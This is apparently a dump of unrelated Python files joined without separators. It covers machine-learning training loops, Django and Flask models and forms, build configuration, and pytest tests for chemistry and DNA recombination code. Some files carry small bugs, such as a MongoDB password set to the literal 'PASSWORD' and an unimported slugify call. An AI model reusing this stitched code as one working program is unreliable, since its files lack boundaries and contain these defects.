tf.range(config.n_clusters, dtype=tf.int32)}, n_z=10 ) x_plots = tf.reshape( tf.transpose(bernoulli_as_pixel(plot_p_net['x']), (1, 0, 2)), (-1, 28, 28) ) def plot_samples(loop): with loop.timeit('plot_time'): images = session.run(x_plots) save_images_collection( images=images, filename='plotting/{}.png'.format(loop.epoch), grid_size=(config.n_clusters, 10), results=results ) # derive the final un-supervised classifier c_classifier = ClusteringClassifier(config.n_clusters, 10) def train_classifier(loop): df = bernoulli_flow( x_train, config.batch_size, shuffle=False, skip_incomplete=False) with loop.timeit('cls_train_time'): [c_pred] = spt.evaluation.collect_outputs( outputs=[q_y_given_x], inputs=[input_x], data_flow=df, ) c_classifier.fit(c_pred, y_train) print(c_classifier.describe()) def evaluate_classifier(loop): with loop.timeit('cls_test_time'): [c_pred] = spt.evaluation.collect_outputs( outputs=[q_y_given_x], inputs=[input_x], data_flow=test_flow, ) y_pred = c_classifier.predict(c_pred) cls_metrics = {'test_acc': accuracy_score(y_test, y_pred)} loop.collect_metrics(cls_metrics) results.update_metrics(cls_metrics) # prepare for training and testing data (x_train, y_train), (x_test, y_test) = \ spt.datasets.load_mnist(x_shape=[784]) train_flow = bernoulli_flow( x_train, config.batch_size, shuffle=True, skip_incomplete=True) test_flow = bernoulli_flow( x_test, config.test_batch_size, sample_now=True) with spt.utils.create_session().as_default() as session, \ train_flow.threaded(5) as train_flow: # train the network with spt.TrainLoop(params, var_groups=['p_net', 'q_net', 'gaussian_mixture_prior'], max_epoch=config.max_epoch, max_step=config.max_step, summary_dir=(results.system_path('train_summary') if config.write_summary else None), summary_graph=tf.get_default_graph(), early_stopping=False) as loop: trainer = spt.Trainer( loop, train_op, [input_x], train_flow, metrics={'loss': loss}, summaries=tf.summary.merge_all(spt.GraphKeys.AUTO_HISTOGRAM) ) trainer.anneal_after( learning_rate, epochs=config.lr_anneal_epoch_freq, steps=config.lr_anneal_step_freq ) evaluator = spt.Evaluator( loop, metrics={'test_nll': test_nll}, inputs=[input_x], data_flow=test_flow, time_metric_name='test_time' ) evaluator.events.on( spt.EventKeys.AFTER_EXECUTION, lambda e: results.update_metrics(evaluator.last_metrics_dict) ) trainer.evaluate_after_epochs(evaluator, freq=10) trainer.evaluate_after_epochs( functools.partial(plot_samples, loop), freq=10) trainer.evaluate_after_epochs( functools.partial(train_classifier, loop), freq=10) trainer.evaluate_after_epochs( functools.partial(evaluate_classifier, loop), freq=10) trainer.log_after_epochs(freq=1) trainer.run() # print the final metrics and close the results object with codecs.open('cluster_classifier.txt', 'wb', 'utf-8') as f: f.write(c_classifier.describe()) print_with_title('Results', results.format_metrics(), before='\n') results.close() if __name__ == '__main__': main() 0 from django.db import models from django.core.validators import MinLengthValidator, RegexValidator from django.contrib.auth.models import User # Create your models here. class DoctorInfo(models.Model): user=models.OneToOneField(User,on_delete=models.CASCADE) address=models.CharField(max_length=100) phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.") phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) picture=models.ImageField(blank=True,null=True) department=models.CharField(max_length=30) gender=models.CharField( max_length=50,blank=True,choices=(('Female','Female'),('Male','Male'),('Other','Other'))) doctorID=models.CharField(max_length=50,unique=True) education_college=models.CharField(max_length=100) education_degree=models.CharField(max_length=100) education_year=models.DateTimeField() def __str__(self): return self.user.first_name+" "+self.user.last_name @property def get_name(self): return self.user.first_name+" "+self.user.last_name @property def get_instance(self): return self cfxx.py import numpy as np def cfx_cal(cfx,nx,un,hs_up,g,snm): for i in np.arange(0,nx+1): cfx[i]=-g*snm**2*un[i]*np.abs(un[i])/hs_up[i]**(4./3.) return cfx from abc import ABC from typing import TypeVar, Generic from fedot.core.dag.graph import Graph from fedot.core.optimisers.fitness import Fitness from .objective import Objective G = TypeVar('G', bound=Graph, covariant=True) class ObjectiveEvaluate(ABC, Generic[G]): """Defines how Objective must be evaluated on Graphs. Responsibilities: - Graph-specific evaluation policy: typically, Graphs require some kind of evaluation before Objective could be estimated on them. E.g. Machine-learning pipelines must be fit on train data before they could be evaluated on the test data. - Objective-specific estimation: typically objectives require additional parameters besides Graphs for estimation, e.g. test data for estimation of prediction quality. - Optionally, compute additional statistics for Graphs (intermediate metrics). Default implementation is just a closure that calls :param objective: with redirected keyword arguments :param objective_kwargs: """ def __init__(self, objective: Objective, **objective_kwargs): self._objective = objective self._objective_kwargs = objective_kwargs @property def objective(self) -> Objective: """Returns underlying objective.""" return self._objective def __call__(self, graph: G) -> Fitness: """Provides functional interface for ObjectiveEvaluate.""" return self.evaluate(graph) def evaluate(self, graph: G) -> Fitness: """Evaluate graph and compute its fitness.""" return self._objective(graph, **self._objective_kwargs) def evaluate_intermediate_metrics(self, graph: G): """Compute intermediate metrics for each graph node and store it there.""" pass def cleanup(self, graph: G): """Clean resources after graph evaluation, if necessary.""" pass #!/usr/bin/env python "测试os._exit" import os def out_here(): print('Bye os world') os._exit(11) print('Never reach') if __name__ == '__main__': out_here() # # All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or # its licensors. # # For complete copyright and license terms please see the LICENSE at the root of this # distribution (the "License"). All use of this software is governed by the License, # or, if provided, by the license below or the license accompanying this file. Do not # remove or modify any license notices. This file is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # import os from waflib.Configure import conf ################################################################ @conf def load_android_clang_common_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations !!! But not the actual compiler, since the compiler depends on the host !!! """ env = conf.env ndk_root = env['ANDROID_NDK_HOME'] # in ndk r13, they removed the 'libcxx' sub-dir, leaving 'include' in the root of the folder stl_root = os.path.join(ndk_root, 'sources', 'cxx-stl', 'llvm-libc++') if env['ANDROID_NDK_REV_MAJOR'] >= 13: stl_includes = os.path.join(stl_root, 'include') else: stl_includes = os.path.join(stl_root, 'libcxx', 'include') env['INCLUDES'] += [ stl_includes, os.path.join(ndk_root, 'sources', 'android', 'support', 'include') # the support includes must be after the stl ones ] common_flags = [ '-femulated-tls', # All accesses to TLS variables are converted to calls to __emutls_get_address in the runtime library '-Wno-unused-lambda-capture', # This was originally disabled only when building Android Clang on MacOS, but it seems the updated toolchain in NDK r15 has # become even more aggressive in "nonportable" include paths, meaning it's nearly impossible to fix the casing the compiler # thinks the path should be. # ORIGINAL COMMENT: Unless specified, OSX is generally case-preserving but case-insensitive. Windows is the same way, however # OSX seems to behave differently when it comes to casing at the OS level where a file can be showing as upper-case in Finder # and Terminal, the OS can see it as lower-case. '-Wno-nonportable-include-path', ] env['CFLAGS'] += common_flags[:] env['CXXFLAGS'] += common_flags[:] env['CXXFLAGS'] += [ '-fms-extensions', # Allow MSVC language extensions ] env['LIB'] += [ 'c++_shared', # shared library of llvm stl ] env['LIBPATH'] += [ os.path.join(stl_root, 'libs', env['ANDROID_ARCH']), ] env['LINKFLAGS'] += [ '-Wl,--gc-sections,--icf=safe', # --gc-sections will discard unused sections. --icf=safe will remove duplicate code ] # these aren't defined in the common clang settings env['SHLIB_MARKER'] = '-Wl,-Bdynamic' env['STLIB_MARKER'] = '-Wl,-Bstatic' # required 3rd party libs that need to be included in the apk env['EXT_LIBS'] += [ conf.add_to_android_cache(os.path.join(stl_root, 'libs', env['ANDROID_ARCH'], 'libc++_shared.so')) ] # not used on android env['ARCH_ST'] = [] # disable support for the following build options env['COMPILER_FLAGS_DisableOptimization'] = [ ] env['COMPILER_FLAGS_DebugSymbols'] = [ ] ################################################################ @conf def load_debug_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "debug" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_profile_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "profile" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_performance_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "performance" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_release_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "release" configuration """ conf.load_android_clang_common_settings() from django.db import models from django.db.models import Q class CommentManager(models.Manager): def get_queryset(self): return super().get_queryset().prefetch_related() def get_for_user(self, user): return self.get_queryset().filter( ( # TODO: include comments liked by user # Q(likes_author__in=user) | ~Q(reports__in=[user]) ) ) import gc import itertools import typing T = typing.TypeVar("T") def chunk_list( iterable: typing.Iterable[T], batch_size: int = 1000 ) -> typing.Iterator[typing.List[T]]: it = iter(iterable) while True: chunk = list(itertools.islice(it, batch_size)) if not chunk: return yield chunk gc.collect() def data_matches_schema( data: typing.Dict[str, typing.Any], obj: typing.Type[object] ) -> bool: annotations = typing.get_type_hints(obj) for variable, expected_type in annotations.items(): datum = data.get(variable) if datum is None: continue if not _data_matches_schema_inner(datum, expected_type): return False return True def _data_matches_schema_inner( data: typing.Any, expected_type: typing.Type[object] ) -> bool: if expected_type is typing.Any: return True if isinstance(expected_type, typing._GenericAlias): # type: ignore typ = expected_type.__origin__ if not isinstance(data, typ): return False args = expected_type.__args__ if typ is list: for v in data: if not _data_matches_schema_inner(v, args[0]): return False else: raise TypeError(f"{typ} is unsupported") elif not isinstance(data, expected_type): return False return True pydefect/tests/chem_pot_diag/test_cpd_plotter.py # -*- coding: utf-8 -*- import numpy as np import pytest from pydefect.chem_pot_diag.chem_pot_diag import ChemPotDiag, CpdPlotInfo, \ CompositionEnergy from pydefect.chem_pot_diag.cpd_plotter import ( ChemPotDiagMpl2DMplPlotter, transpose, sort_coords, ChemPotDiagMpl3DMplPlotter, ChemPotDiagPlotly2DMplPlotter, ChemPotDiagPlotly3DMplPlotter) from pymatgen.core.composition import Composition from vise.util.dash_helper import show_png try: import psutil PSUTIL_NOT_PRESENT = False except ModuleNotFoundError: PSUTIL_NOT_PRESENT = True @pytest.fixture def cpd_plot_info_2d(): energies = [CompositionEnergy(Composition("H"), 0.0, ""), CompositionEnergy(Composition("O"), 1.0, ""), CompositionEnergy(Composition("H4O2"), -4.0, "")] cpd = ChemPotDiag(energies, target=Composition("H2O")) return CpdPlotInfo(cpd, min_range=-10) @pytest.mark.skipif(False, reason="") def test_cpd_2d_draw(cpd_plot_info_2d): plotter = ChemPotDiagMpl2DMplPlotter(cpd_plot_info_2d) plotter.draw_diagram().show() @pytest.fixture def cpd_3d_info(): energies = [CompositionEnergy(Composition("H"), 0.0, ""), CompositionEnergy(Composition("O"), 1.0, ""), CompositionEnergy(Composition("H4O2"), -4.0, ""), CompositionEnergy(Composition("MgH2O"), -10.0, ""), CompositionEnergy(Composition("Mg"), 0.0, ""), CompositionEnergy(Composition("MgO"), -3.0, "")] cpd = ChemPotDiag(energies, target=Composition("MgH2O")) return CpdPlotInfo(cpd) @pytest.mark.skipif(False, reason="") def test_cpd_3d_draw(cpd_3d_info): plotter = ChemPotDiagMpl3DMplPlotter(cpd_3d_info) plotter.draw_diagram().show() def test_transpose(): target_list = [[1, 2], [3, 4]] actual = transpose(target_list) expected = [[1, 3], [2, 4]] assert actual == expected def test_sort_coords(): coords = np.array([[3, 2, -1], [-1, 2, 0], [-6, -1, 4], [1, -3, 3]]) expected = np.array([[1, -3, 3], [-6, -1, 4], [-1, 2, 0], [3, 2, -1]]) np.testing.assert_array_equal(sort_coords(coords), expected) @pytest.mark.skipif(PSUTIL_NOT_PRESENT, reason="psutil does not exist") def test_plotly_2d(cpd_plot_info_2d): plotter = ChemPotDiagPlotly2DMplPlotter(cpd_plot_info_2d) fig = plotter.figure # fig.show() show_png(fig) @pytest.mark.skipif(PSUTIL_NOT_PRESENT, reason="psutil does not exist") def test_plotly_3d(cpd_3d_info): plotter = ChemPotDiagPlotly3DMplPlotter(cpd_3d_info) fig = plotter.figure # fig.show() show_png(fig) import pytest from Bio.SeqRecord import SeqRecord from Bio.Seq import Seq import crecombio def test_count_number_of_sites(): seq_with_three_sites = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" "GGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCC" ) ) site = crecombio.SITES["Flp"]["seq"] matches, rc_matches = crecombio.count_number_of_sites(seq_with_three_sites, site) assert matches == [26, 82] assert rc_matches == [145] def test_recombine_one_sequence(): # Not 2 FRT sites: no_frt_seq = SeqRecord(Seq("ATCG")) with pytest.raises(Exception): crecombio.recombine_one_sequence([no_frt_seq]) # FRTs in same direction: excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) results = crecombio.recombine_one_sequence([excision_seq]) assert ( str(results[0].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # FRTs in opposite direction: inversion_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "GGGGGGGGGGGGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) results = crecombio.recombine_one_sequence([inversion_seq]) assert ( str(results[0].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCT" "TTTTTTTTTTTTGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) def test_recombine_two_sequences(): # Test translocation: seq0 = SeqRecord( Seq("AAAAAAAAAAAAAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAA") ) seq1 = SeqRecord( Seq("TTTTTTTTTTTTTTTTTTTTGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTT") ) recombined_seqs = crecombio.recombine_two_sequences([seq0, seq1]) assert ( str(recombined_seqs[0].seq) == "AAAAAAAAAAAAAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "TTTTTTTTTTTTTTTTTTTTGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAA" ) # Test insertion: excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) target_seq = SeqRecord( Seq("GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT") ) # Excision seq first, target seq second: recombined_seqs = crecombio.recombine_two_sequences([excision_seq, target_seq]) assert ( str(recombined_seqs[0].seq) == "GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAAAAAAAAAAAGA" "AGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # Target seq first, excision seq second: recombined_seqs = crecombio.recombine_two_sequences([target_seq, excision_seq]) assert ( str(recombined_seqs[0].seq) == "GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAAAAAAAAAAAGA" "AGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # 2x2 FRT sites: with pytest.raises(Exception): crecombio.recombine_two_sequences([excision_seq, excision_seq]) # Incorrect number of FRT sites: with pytest.raises(Exception): crecombio.recombine_two_sequences( [SeqRecord(Seq("ATCG")), SeqRecord(Seq("ATCG"))] ) def test_recombine(): excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "GGGGGGGGGGGGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) crecombio.recombine([excision_seq]) # 1 seq crecombio.recombine([excision_seq, excision_seq]) # 2 seq with pytest.raises(Exception): crecombio.recombine( [excision_seq, excision_seq, excision_seq] ) # not 1 or 2 seq import os from flask_mongoengine import MongoEngine def init_database_connection(app): app.config['MONGODB_SETTINGS'] = { 'db': os.environ.get('DATABASE_NAME'), 'host': 'mongodb+srv://' + os.environ.get('HOST') + '/' + os.environ.get('DATABASE_NAME') + '?retryWrites=true&w=majority', 'username': os.environ.get('USERNAME'), # 'username': 'justinhchae@admin', 'password': ('PASSWORD') } db = MongoEngine() db.init_app(app)from django.db import models from hitcount.models import HitCountMixin, HitCount from django.contrib.contenttypes.fields import GenericRelation from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class Post(models.Model): title = models.CharField(max_length=100) description = models.TextField() published = models.DateField(auto_now_add=True) slug = models.SlugField(unique=True, max_length=100) hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk', related_query_name='hit_count_generic_relation') def __str__(self): return self.title def save(self, *args, **kwargs): if not self.slug: self.slug = slugify(self.title) return super(Post, self).save(*args, **kwargs)import torch import random import torch.autograd as autograd import torch.nn as nn import torch.nn.functional as F import os from utils.conf import args, set_random_seed from models.Set2Seq2Seq import ListeningAgent from models.Losses import seq_cross_entropy_loss from preprocesses.DataIterator import PairDataset from preprocesses.Voc import Voc from analysis.cal_topological_similarity import cal_topological_sim from analysis.get_input_message_pairs import reproduce_msg_output class Set2Seq2Seq(nn.Module): def __init__(self, voc_size, msg_length=args.max_msg_len, msg_vocsize=args.msg_vocsize, hidden_size=args.hidden_size, dropout=args.dropout_ratio): super().__init__() self.voc_size = voc_size self.msg_length = msg_length self.msg_vocsize = msg_vocsize self.hidden_size = hidden_size self.dropout = dropout # For embedding inputs self.embedding = nn.Embedding(self.voc_size, self.hidden_size) self.msg_embedding = nn.Embedding(self.msg_vocsize, self.hidden_size).weight # Listening agent self.listener = ListeningAgent( self.msg_vocsize, self.hidden_size, self.voc_size, self.dropout, self.embedding.weight, self.msg_embedding ) def forward(self, data_batch): input_var = data_batch['input'] msg_mask = data_batch['input_mask'] target_var = data_batch['target'] target_mask = data_batch['target_mask'] target_max_len = data_batch['target_max_len'] msg = F.one_hot(input_var, num_classes=args.msg_vocsize).to(torch.float32) msg_mask = msg_mask.to(torch.float32).unsqueeze(1) listener_outputs = self.listener(msg, msg_mask, target_max_len) loss_max_len = min(listener_outputs.shape[0], target_var.shape[0]) loss, print_losses, tok_correct, seq_correct, tok_acc, seq_acc\ = seq_cross_entropy_loss(listener_outputs, target_var, target_mask, loss_max_len) return loss, 0., print_losses, tok_correct, seq_correct, tok_acc, seq_acc def train_epoch(model, data_batch, m_optimizer, clip=args.clip): # Zero gradients m_optimizer.zero_grad() # Forward pass through model loss, baseline, print_losses, tok_correct, seq_correct, tok_acc, seq_acc = model(data_batch) # Perform backpropatation loss.mean().backward() # Clip gradients: gradients are modified in place nn.utils.clip_grad_norm_(model.parameters(), clip) # Adjust model weights m_optimizer.step() return seq_acc, tok_acc, sum(print_losses) / len(print_losses) def eval_model(model, dataset): model.eval() loss = 0. seq_acc = 0. tok_acc = 0. for _, data_batch in enumerate(dataset): _, baseline, print_losses, tok_correct, seq_correct, t_acc, s_acc = model(data_batch) loss += sum(print_losses) / len(print_losses) seq_acc += s_acc tok_acc += t_acc loss /= len(dataset) seq_acc /= len(dataset) tok_acc /= len(dataset) model.train() return seq_acc, tok_acc, loss def train(): print('building vocabulary...') voc = Voc() print('done') print('loading data and building batches...') train_set = PairDataset(voc, dataset_file_path=args.train_file) dev_set = PairDataset(voc, dataset_file_path=args.dev_file) # test_set = PairDataset(voc, dataset_file_path=TEST_FILE_PATH) print('done') if args.param_file is not None: print('loading saved parameters from ' + args.param_file + '...') checkpoint = torch.load(args.param_file, map_location=args.device) train_args = checkpoint['args'] voc = checkpoint['voc'] print('done') print('arguments for training:') print(train_args) print('rebuilding model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model.load_state_dict(checkpoint['model']) model_optimiser = train_args.optimiser(model.parameters(), lr=train_args.learning_rate) print('\tdone') else: print('building model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model_optimiser = args.optimiser(model.parameters(), lr=args.learning_rate) print('done') print('initialising...') start_iteration = 1 print_loss = 0. print_seq_acc = 0. print_tok_acc = 0. max_dev_seq_acc = 0. max_dev_tok_acc = 0. training_losses = [] training_tok_acc = [] training_seq_acc = [] training_sim = [] eval_tok_acc = [] eval_seq_acc = [] print('done') print('training...') for iter in range(start_iteration, args.iter_num+1): for idx, data_batch in enumerate(train_set): seq_acc, tok_acc, loss = train_epoch(model, data_batch, model_optimiser ) print_loss += loss print_seq_acc += seq_acc print_tok_acc += tok_acc if iter % args.print_freq == 0: print_loss_avg = print_loss / (args.print_freq * len(train_set)) print_seq_acc_avg = print_seq_acc / (args.print_freq * len(train_set)) print_tok_acc_avg = print_tok_acc / (args.print_freq * len(train_set)) print("Iteration: {}; Percent complete: {:.1f}%; Avg loss: {:.4f}; Avg seq acc: {:.4f}; Avg tok acc: {:.4f}".format( iter, iter / args.iter_num * 100, print_loss_avg, print_seq_acc_avg, print_tok_acc_avg )) training_seq_acc.append(print_seq_acc_avg) training_tok_acc.append(print_tok_acc_avg) training_losses.append(print_loss_avg) print_seq_acc = 0. print_tok_acc = 0. print_loss = 0. if iter % args.eval_freq == 0: dev_seq_acc, dev_tok_acc, dev_loss = eval_model(model, dev_set) if dev_seq_acc > max_dev_seq_acc: max_dev_seq_acc = dev_seq_acc if dev_tok_acc > max_dev_tok_acc: max_dev_tok_acc = dev_tok_acc eval_tok_acc.append(dev_tok_acc) eval_seq_acc.append(dev_seq_acc) print("[EVAL]Iteration: {}; Loss: {:.4f}; Avg Seq Acc: {:.4f}; Avg Tok Acc: {:.4f}; Best Seq Acc: {:.4f}".format( iter, dev_loss, dev_seq_acc, dev_tok_acc, max_dev_seq_acc)) if iter % args.save_freq == 0: path_join = 'listener_' + str(args.num_words) + '_' + args.msg_mode path_join += '_hard' if not args.soft else '_soft' directory = os.path.join(args.save_dir, path_join) if not os.path.exists(directory): os.makedirs(directory) torch.save({ 'iteration': iter, 'model': model.state_dict(), 'opt': [ model_optimiser.state_dict() ], 'loss': loss, 'voc': voc, 'args': args, 'records': { 'training_loss': training_losses, 'training_tok_acc': training_tok_acc, 'training_seq_acc': training_seq_acc, 'training_sim': training_sim, 'eval_tok_acc': eval_tok_acc, 'eval_seq_acc': eval_seq_acc } }, os.path.join(directory, '{}_{}_{}.tar'.format(args.seed, iter, 'checkpoint'))) def test(): if args.param_file is None: print('please specify the saved param file.') exit(-1) else: print('loading saved parameters from ' + args.param_file + '...') checkpoint = torch.load(args.param_file, map_location=args.device) train_args = checkpoint['args'] voc = checkpoint['voc'] print('done') print('arguments for train:') print(train_args) print('rebuilding model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model.load_state_dict(checkpoint['model']) model_optimizer = train_args.optimiser(model.parameters(), lr=args.learning_rate) model_optimizer.load_state_dict(checkpoint['opt']) print('done') print('loading test data...') test_set = PairDataset(voc, dataset_file_path=args.test_file) print('done') test_seq_acc, test_tok_acc, test_loss = eval_model(model, test_set) print("[TEST]Loss: {:.4f}; Seq-level Accuracy: {:.4f}; Tok-level Accuracy: {:.4f}".format( test_loss, test_seq_acc * 100, test_tok_acc * 100) ) if __name__ == '__main__': set_random_seed(args.seed) with autograd.detect_anomaly(): print('with detect_anomaly') if args.test: test() else: train() from typing import List class Solution: def can_place_flowers(self, flowerbed: List[int], n: int) -> bool: ans = 0 temp = [0] + flowerbed + [0] for i in range(1, len(temp) - 1): if temp[i - 1] == temp[i + 1] == temp[i] == 0: ans += 1 temp[i] = 1 return ans >= n if __name__ == "__main__": assert not Solution().can_place_flowers([1, 0, 0, 1, 0, 0, 1], 1) assert Solution().can_place_flowers([0, 0, 1, 0, 0], 2) tkrons/SPFlow_topdownrules """ Created on August 29, 2018 @author: """ from numpy.random.mtrand import RandomState from scipy.misc import imresize, imsave from spn.data.datasets import get_mnist import numpy as np def get_imgs(dataset, size=(20, 20)): assert dataset.shape[1] == np.prod(size), "invalid image size for dataset size" return dataset.reshape(dataset.shape[0], size[0], size[1]) def get_blocks(imgs, num_blocks=(2, 2), blocks=[0, 1]): assert imgs.shape[1] % num_blocks[0] == 0, "invalid image size for num_blocks" assert imgs.shape[2] % num_blocks[1] == 0, "invalid image size for num_blocks" vsplits = np.split(imgs, num_blocks[0], axis=1) splits = [np.split(vs, num_blocks[1], axis=2) for vs in vsplits] blocks_imgs = np.concatenate(splits) ds = np.concatenate([b.reshape(imgs.shape[0], -1) for b in blocks_imgs[blocks]], axis=1) return ds, blocks def stitch_imgs(imgs=0, img_size=(20, 20), num_blocks=(2, 2), blocks=None): block_size = (img_size[0] // num_blocks[0], img_size[1] // num_blocks[1]) result = np.zeros((imgs, img_size[0], img_size[1])) result_idx = np.arange(0, np.prod(num_blocks)).reshape(num_blocks[0], num_blocks[1]) for block_pos, block_values in blocks.items(): if type(block_pos) == int: block_pos = [block_pos] sub_blocks = np.split(block_values, len(block_pos), axis=1) for bp, bv in zip(block_pos, sub_blocks): bv = bv.reshape(-1, block_size[0], block_size[1]) idx, idy = np.where(result_idx == bp) idx = idx[0] * block_size[0] idy = idy[0] * block_size[1] result[:, idx : idx + block_size[0], idy : idy + block_size[1]] = bv return result def rescale(ds, original_size=(28, 28), new_size=(20, 20)): assert ds.shape[1] == np.prod(original_size), "invalid image size for dataset size" assert np.all(np.array(new_size) > 0), "new_size should be positive" img_data = np.reshape(ds, (-1, original_size[0], original_size[1])) return np.asarray([imresize(image, new_size) for image in img_data], dtype=np.float64).reshape(ds.shape[0], -1) def show_img(img): import matplotlib.pyplot as plt plt.imshow(img) plt.show() def save_img(img, path): imsave(path, img) def standardize(imgs): return imgs / np.max(imgs) def add_poisson_noise(imgs, seed=123): poisson_noise = RandomState(seed).poisson(lam=1, size=imgs.shape) return imgs + poisson_noise def get_sub_blocks(block, inp=[1, 0], output=[0]): sub_blocks = np.split(block, len(inp), axis=1) res_blocks = [sub_blocks[inp.index(o)] for o in output] result = np.concatenate(res_blocks, axis=1) return result def set_sub_block_nans(block, inp=[1, 0], nans=[0]): block_size = block.shape[1] // len(inp) for o in nans: clear_index = inp.index(o) rpos = clear_index * block_size block[:, rpos : rpos + block_size] = np.nan return block if __name__ == "__main__": images_tr, labels_tr, images_te, labels_te = get_mnist() ds = images_tr[[0, 1, 2], :] ds = rescale(ds, original_size=(28, 28), new_size=(20, 40)) imgs = get_imgs(ds, size=(20, 40)) show_img(imgs[0]) blocks0, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[0]) blocks10, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[1, 0]) blocks210, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[2, 1, 0]) blocks3210, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[3, 2, 1, 0]) block_img = stitch_imgs( blocks0.shape[0], img_size=(20, 40), num_blocks=(2, 2), blocks={(3, 2, 1, 0): set_sub_block_nans(blocks3210, inp=[3, 2, 1, 0], nans=[0])} # blocks={(0): blocks0, # (1): get_sub_blocks(blocks10, inp=[1, 0], output=[1]), # (2): get_sub_blocks(blocks210, inp=[2, 1, 0], output=[2]), # (3): get_sub_blocks(blocks3210, inp=[3, 2, 1, 0], output=[3])} ) show_img(block_img[0]) # coding:utf-8 import sys reload(sys) sys.setdefaultencoding('utf8') from flask_wtf import Form from wtforms import SelectField, StringField, TextAreaField, SubmitField, PasswordField,IntegerField,FileField,BooleanField from wtforms.validators import DataRequired, Length, Email, EqualTo class baseForm(Form): name = StringField(u'名称(仅仅作为标记):', validators=[DataRequired(), Length(1, 64)]) class proxybaseForm(baseForm): frpc = SelectField(u'选择一个已经创建的Frpc:', coerce=int, validators=[DataRequired()]) class localproxybaseForm(proxybaseForm): local_ip = StringField(u'本地ip地址:') # 127.0.0.1 local_port = StringField(u'本地端口:', validators=[DataRequired()]) # 22 use_encryption = BooleanField(u'是否加密:') # false use_compression = BooleanField(u'是否压缩:') # false class CommonForm(baseForm): user = StringField(u'frpc用户名:', validators=[DataRequired(), Length(1, 64)]) # your_name server_addr = StringField(u'服务器地址:', validators=[DataRequired(), Length(1, 16)]) # 0.0.0.0 server_port = StringField(u'服务器端口:', validators=[DataRequired()]) # 7000 log_file = StringField(u'日志保存位置:') # ./ frpc.log log_level = StringField(u'日志等级:') # info log_max_days = StringField(u'日志存储天数:') # 3 privilege_token = StringField(u'服务器秘钥:') # 12345678 admin_addr = StringField(u'admin绑定地址:') # 127.0.0.1 admin_port = StringField(u'admin绑定端口:') # 7400 admin_user = StringField(u'admin用户名:') # admin admin_pwd = StringField(u'admin密码:') # admin pool_count = StringField(u'连接池数量:') # 5 